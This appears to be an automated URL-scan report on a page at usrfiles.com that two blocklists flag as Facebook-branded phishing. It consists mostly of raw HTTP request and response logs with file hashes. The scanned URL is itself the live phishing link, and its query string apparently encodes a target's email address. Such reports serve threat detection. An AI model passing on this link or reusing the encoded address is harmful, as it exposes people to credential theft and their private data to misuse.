GET /rsrc.php/v3/yr/l/0,cross/80CKmjtnEKi.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	157.240.205.11 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Thu, 21 Mar 2024 03:32:52 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: I46ebw2KMHiSMFEw41DOEw== x-fb-debug: sgh0aI2YdDMFKp7mXBCxpWvYWqQls4DwHnOfUTxfJ5wWz4pEsw+wu2hYqbJ4euqnIzx706YoCXIkbWmSbMjVzA== content-length: 4963 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (7489) Size: 4963 Md5: 238e9e6f0d8a307892305130e350ce13 Sha1: aa1c0b98bed8bddf70dceb4ce10ff57b314565dd Sha256: b3fd19b0ae45eacecfb8fc3973747a4a85505e3ecb2d2ad083b253808359cfb1
GET /rsrc.php/v3/y-/l/0,cross/NzQtERYtGB2.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Thu, 21 Mar 2024 03:32:52 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: woxMZEDmD9vzGGcgUpoOAA== x-fb-debug: ueeRT1nGEfsFxrl8N8qKep+c5vRYnATzqh2XnWfYhit2dm6Y1Ve2yHKI7PXl7BXBLgDXFs4s/e3jrWfIdtFnfg== content-length: 14813 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (6639) Size: 14813 Md5: c28c4c6440e60fdbf3186720529a0e00 Sha1: a34f07fd571760cf5708d29230e04d338139c284 Sha256: d9f54cbf366941a3fd9b831a235a8bbf7ee52a101ea6fdd005c136b5af88e32a
GET /rsrc.php/y8/r/dF5SId3UHWd.svg HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site TE: trailers	157.240.205.11 HTTP/2 200 OK content-type: image/svg+xml vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Thu, 14 Mar 2024 17:22:00 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: NiMA5zHIsmaYxSYEaw9fHg== x-fb-debug: pKICp//t03kM7U99Wn4pipCy/ETFMZv4oeUwEvLQmAQWLcT6cn8SQkECbEG9XF+/wp23DkzeMhCXFadPuilfOg== content-length: 1027 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: SVG Scalable Vector Graphics image\012- HTML document text\012- HTML document, ASCII text, with very long lines (2384) Size: 1027 Md5: 362300e731c8b26698c526046b0f5f1e Sha1: 6cd41a329b54f1fb112080237f7fb4dc32d19a10 Sha256: 436bb968741d670e68050258e3544afccd828ff52cc55077577ff67f5e058e55
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "55E47B413BA648A98EB6E92AB73AEE602912CD13E7DA23EF3CEA1490C1B9DE50" Last-Modified: Sun, 19 Mar 2023 18:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=5636 Expires: Wed, 22 Mar 2023 05:06:48 GMT Date: Wed, 22 Mar 2023 03:32:52 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 3462d41d9283fedf24f278089d5d1570 Sha1: b8bcea77656f775cdc34620322cc616216ed2b95 Sha256: 55e47b413ba648a98eb6e92ab73aee602912cd13e7da23ef3cea1490c1b9de50
GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: swASHNt/Zlg8LjbmmkC6yA== Connection: keep-alive, Upgrade Sec-Fetch-Dest: websocket Sec-Fetch-Mode: websocket Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache Upgrade: websocket	52.41.156.90 HTTP/1.1 101 Switching Protocols Connection: Upgrade Upgrade: websocket Sec-WebSocket-Accept: lOYwjExWT3aU73vM0iu42KmVWzU= --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "C8FF32C6809A506D4C656D3200DBFC6682C156C3DE0647D13AB8F07A6F9A38BA" Last-Modified: Tue, 21 Mar 2023 15:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=7222 Expires: Wed, 22 Mar 2023 05:33:16 GMT Date: Wed, 22 Mar 2023 03:32:54 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: a0d3d7099bbc5fed74a6e78e1a3096bf Sha1: 96afaf8b3ac053577c56aca5f4a20d8655ecb771 Sha256: c8ff32c6809a506d4c656d3200dbfc6682c156c3de0647d13ab8f07a6f9a38ba
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "C8FF32C6809A506D4C656D3200DBFC6682C156C3DE0647D13AB8F07A6F9A38BA" Last-Modified: Tue, 21 Mar 2023 15:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=7222 Expires: Wed, 22 Mar 2023 05:33:16 GMT Date: Wed, 22 Mar 2023 03:32:54 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: a0d3d7099bbc5fed74a6e78e1a3096bf Sha1: 96afaf8b3ac053577c56aca5f4a20d8655ecb771 Sha256: c8ff32c6809a506d4c656d3200dbfc6682c156c3de0647d13ab8f07a6f9a38ba
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "C8FF32C6809A506D4C656D3200DBFC6682C156C3DE0647D13AB8F07A6F9A38BA" Last-Modified: Tue, 21 Mar 2023 15:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=7222 Expires: Wed, 22 Mar 2023 05:33:16 GMT Date: Wed, 22 Mar 2023 03:32:54 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: a0d3d7099bbc5fed74a6e78e1a3096bf Sha1: 96afaf8b3ac053577c56aca5f4a20d8655ecb771 Sha256: c8ff32c6809a506d4c656d3200dbfc6682c156c3de0647d13ab8f07a6f9a38ba
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "C8FF32C6809A506D4C656D3200DBFC6682C156C3DE0647D13AB8F07A6F9A38BA" Last-Modified: Tue, 21 Mar 2023 15:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=7222 Expires: Wed, 22 Mar 2023 05:33:16 GMT Date: Wed, 22 Mar 2023 03:32:54 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: a0d3d7099bbc5fed74a6e78e1a3096bf Sha1: 96afaf8b3ac053577c56aca5f4a20d8655ecb771 Sha256: c8ff32c6809a506d4c656d3200dbfc6682c156c3de0647d13ab8f07a6f9a38ba
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F882a2ebf-b22a-46de-bf52-8b9a1aaa2743.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 8037 x-amzn-requestid: 7a9f7bb5-d810-4831-b5d2-3eead1af864a x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CJprcGY1IAMFSAg= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641a2315-53cdee4b645ed18e1dfeb92c;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 21:35:17 GMT x-amz-cf-pop: HIO52-P1, SEA19-C3 x-cache: Miss from cloudfront x-amz-cf-id: QW8T5AGg_L1mT4fE8IHeBG9TSiGpbBJpZE2yZdBtAQMJCPV8OKK5Dw== via: 1.1 a87682502db4b394cc6ba84510da9f98.cloudfront.net (CloudFront), 1.1 ae06b19943a6bad1c1b12b79f7339498.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 21:43:22 GMT age: 20972 etag: "8229b537f84a7418dc67e30691e62db4cea67f0f" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 8037 Md5: aeb0d8069d746e467fecd886c0e42628 Sha1: 8229b537f84a7418dc67e30691e62db4cea67f0f Sha256: 24705dc5b7eefd79a35323beee7c741aa041c3bf55801d13b4ffc2b202e6a394
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F5ceeeb08-532b-488e-be1c-b788708d76a2.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 5686 x-amzn-requestid: 8e5120a5-ecfd-4850-9560-a71e7bd1940c x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CHqH3GHwoAMFVSw= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641956fe-0a1578d857aa27bb521b4292;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 07:04:30 GMT x-amz-cf-pop: HIO52-P1, SEA19-C3 x-cache: Miss from cloudfront x-amz-cf-id: OLBdDXSEiTByfiQh1PHhDVU8PDQa7F9Irau-RrOJWC88bFMMt1FrEA== via: 1.1 185f4b03b711932fc7e735c08fdc5abe.cloudfront.net (CloudFront), 1.1 618052a0d9c86c1a3bf663f82d041d1c.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 07:18:10 GMT etag: "2b6f011b911eb48604f22971afb21f61e4a14b70" age: 72884 cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 5686 Md5: 76347a0b2f0908b35321e7a53e5eb91c Sha1: 2b6f011b911eb48604f22971afb21f61e4a14b70 Sha256: ac892c186171836289a2ebd733ce96a2659d640f6408527bf8c6422ca31e713b
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F844f3e97-b153-4a18-b087-e858f349c316.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 8979 x-amzn-requestid: 2ef93be0-3140-4ee5-82d7-a56e73350e9a x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CJpraEVyoAMF4_Q= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641a2315-5ef93dc8183099e43c4679d9;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 21:35:17 GMT x-amz-cf-pop: HIO52-P1, SEA19-C3 x-cache: Hit from cloudfront x-amz-cf-id: bKtbsfvZ9ooTwHawEQd1g5a4uQQGQfLJWf_QhiFkwRgwhSvW4JbYSA== via: 1.1 ee32c7a76e2727d565413cc6c352ef48.cloudfront.net (CloudFront), 1.1 82c2ab57bc9900898383f6b70681b9e6.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 21:41:23 GMT age: 21091 etag: "d4e02105d3b968143681ee23ffe08443da8a7968" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 8979 Md5: d8ab9fe4465396637b9c70a873634f63 Sha1: d4e02105d3b968143681ee23ffe08443da8a7968 Sha256: 8f95b0a0bd72b13e993324d417e7a5b06803d9a506be2092a16054797e248982
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F08561a1f-1d19-45db-be98-107d6b1ed25d.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 10480 x-amzn-requestid: 58aa8272-4b4e-4a2f-9d6e-d47f70891c49 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CJptHG7JoAMFSwA= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641a2320-2fd6502b1271d5c13b4ebbe9;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 21:35:28 GMT x-amz-cf-pop: SEA19-C1, SEA19-C3 x-cache: Hit from cloudfront x-amz-cf-id: hqGFdT1Sk0IcvaNqfvjz5RsGBK-qMBcNKbK9FyZ7OoiH30hDL9ekxA== via: 1.1 2241406ac19fffc8f35d6ddef8e22f56.cloudfront.net (CloudFront), 1.1 de2dd11312f7d5ad3bcd0cb112c7fd0e.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 21:59:52 GMT age: 19982 etag: "5f7ea91288a2170bcabdca6be296718c4191eacd" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 10480 Md5: 6f0b9e85381489dcf646c251722b21d4 Sha1: 5f7ea91288a2170bcabdca6be296718c4191eacd Sha256: 911f803271ad9053ebac3787bdde9b75ec604acc6aa28692cc8e4c5c4fb61483
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F7448874a-86d5-4c34-b675-b71037ef71ac.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 16968 x-amzn-requestid: 0b5d1157-e52b-4efe-8ce5-e11845b257b5 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CJqOpHF1oAMFVjQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641a23f7-38278f07532ce3fe0a52c114;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 21:39:03 GMT x-amz-cf-pop: HIO52-P1, SEA19-C3 x-cache: Miss from cloudfront x-amz-cf-id: tKfSiC95frj9or9ULZ2u30SCixukdMGR5QiVnY_A0I4AMOgsSxGjHw== via: 1.1 4e4278a2778e72cc34feef6db603088c.cloudfront.net (CloudFront), 1.1 219e8f088c8c2a564bdacafe44be620a.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 22:09:39 GMT age: 19395 etag: "de8b17bc7527517db4d2d0c5f0b77617969e8a55" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 16968 Md5: f5698f1af89c557551dfd0cb1c0d186a Sha1: de8b17bc7527517db4d2d0c5f0b77617969e8a55 Sha256: e80eef6ea76da09f35a588d77186f5110a0d8631646f73fb4aa1ecf7de751f13
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F255e6a5a-97bb-4a35-8a48-4d120747a63c.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 4000 x-amzn-requestid: 68dc01d7-3eed-48f6-8532-8efaa96cc1ec x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CJpraEqyoAMFgNQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641a2315-3852cc8961365a560d1fa02f;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 21:35:17 GMT x-amz-cf-pop: HIO52-P1, SEA19-C3 x-cache: Miss from cloudfront x-amz-cf-id: 2e9Y7K5xIkpbhFR8a4kGAVX7X2-97lB13zHrjOuqlkalxzdbCDcfPA== via: 1.1 288c777a01e22425da9494dad7a69734.cloudfront.net (CloudFront), 1.1 abbf2df97f9d83839470842dc2e68cb6.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 21:41:23 GMT age: 21091 etag: "b798268806dc2f79f033e5872676019faf0e0cc1" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 4000 Md5: 85351059b67b0a42eda7e69a31b3b4b4 Sha1: b798268806dc2f79f033e5872676019faf0e0cc1 Sha256: 86e163b7159b197d6358ab01333ac6da221de0ebe1c5da8d5cef2977d38625fe
GET /security/hsts-pixel.gif HTTP/1.1 Host: facebook.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	157.240.205.35 HTTP/2 200 OK content-type: image/gif vary: Accept-Encoding content-encoding: br report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"} x-fb-rlafr: 0 content-security-policy: default-src data: blob: 'self' https://.fbsbx.com 'unsafe-inline' .facebook.com .fbcdn.net 'unsafe-eval';script-src .facebook.com .fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src .fbcdn.net data: .facebook.com 'unsafe-inline';connect-src .facebook.com facebook.com .fbcdn.net wss://.facebook.com:* wss://.fbcdn.net attachment.fbsbx.com blob: .cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ .fbsbx.com;font-src data: .facebook.com .fbcdn.net .fbsbx.com;img-src .fbcdn.net .facebook.com data: https://.fbsbx.com facebook.com .cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: .oculuscdn.com;media-src .cdninstagram.com blob: .fbcdn.net .fbsbx.com www.facebook.com .facebook.com data:;frame-src .facebook.com .fbsbx.com fbsbx.com data: .fbcdn.net;worker-src blob: .facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; document-policy: force-load-at-top cross-origin-resource-policy: cross-origin cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report" cross-origin-opener-policy: same-origin-allow-popups pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT x-content-type-options: nosniff x-xss-protection: 0 x-frame-options: DENY access-control-allow-origin: strict-transport-security: max-age=15552000; includeSubDomains x-fb-debug: sU9aKejOI8YeWj0hLeD77+m375CWOLrASX8J7NId2YJO9j48ZjlBmH3TiGwb2Y6PGwvgfUfY13jJL4iVvj6i4g== date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: Sha1: Sha256:

URL	www.usrfiles.com/html/d717b5_84399193f1fde90a24ff165dbe8c6c9d.html?147615U295d2luZ3M5OUBpY2xvdWQuY29thttps=
IP	34.102.176.152 (United States)
ASN	#15169 GOOGLE
UserAgent	Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Access	public
Report completed	2023-03-22 03:33:02 UTC
Status	Loading report..
IDS alerts	0
Blocklist alert	2
urlquery alerts	No alerts detected
Tags	None

Request	Response
GET /html/d717b5_84399193f1fde90a24ff165dbe8c6c9d.html?147615U295d2luZ3M5OUBpY2xvdWQuY29thttps= HTTP/1.1 Host: www.usrfiles.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1	34.102.176.152 HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: openresty/1.21.4.1 Content-Length: 83356 Accept-Ranges: bytes Access-Control-Allow-Origin: * Timing-Allow-Origin: * X-Seen-By: gcp.us-central-1.media-router-77bc6f7769-d4jl6 Via: 1.1 google Date: Wed, 22 Mar 2023 03:02:57 GMT Expires: Wed, 22 Mar 2023 04:02:57 GMT Cache-Control: public, max-age=15552000, immutable Age: 1794 Last-Modified: Mon, 13 Mar 2023 21:25:16 GMT ETag: "84399193f1fde90a24ff165dbe8c6c9d" --- Additional Info --- Magic: HTML document, ASCII text, with very long lines (64621) Size: 83356 Md5: 84399193f1fde90a24ff165dbe8c6c9d Sha1: 6e7789c33d8a51910cf2f2f094689f232c679c46 Sha256: 98d611f0014b928623b6e8f374e06c9551742fe97f6a4026420d80db39ea7341 Blocklists: - openphish: Facebook, Inc. - fortinet: Phishing
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "1DC32C78E4E850303813338FD4E9616A41C8C05D1063748A1E76A92C397A5E8F" Last-Modified: Mon, 20 Mar 2023 02:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=8282 Expires: Wed, 22 Mar 2023 05:50:53 GMT Date: Wed, 22 Mar 2023 03:32:51 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: ec332b81a27117ce9c16b67a5a8e4fac Sha1: b6d2afa2c859d000ad830d3d8d73f57bac6ffce2 Sha256: 1dc32c78e4e850303813338fd4e9616a41c8c05d1063748a1e76a92c397a5e8f
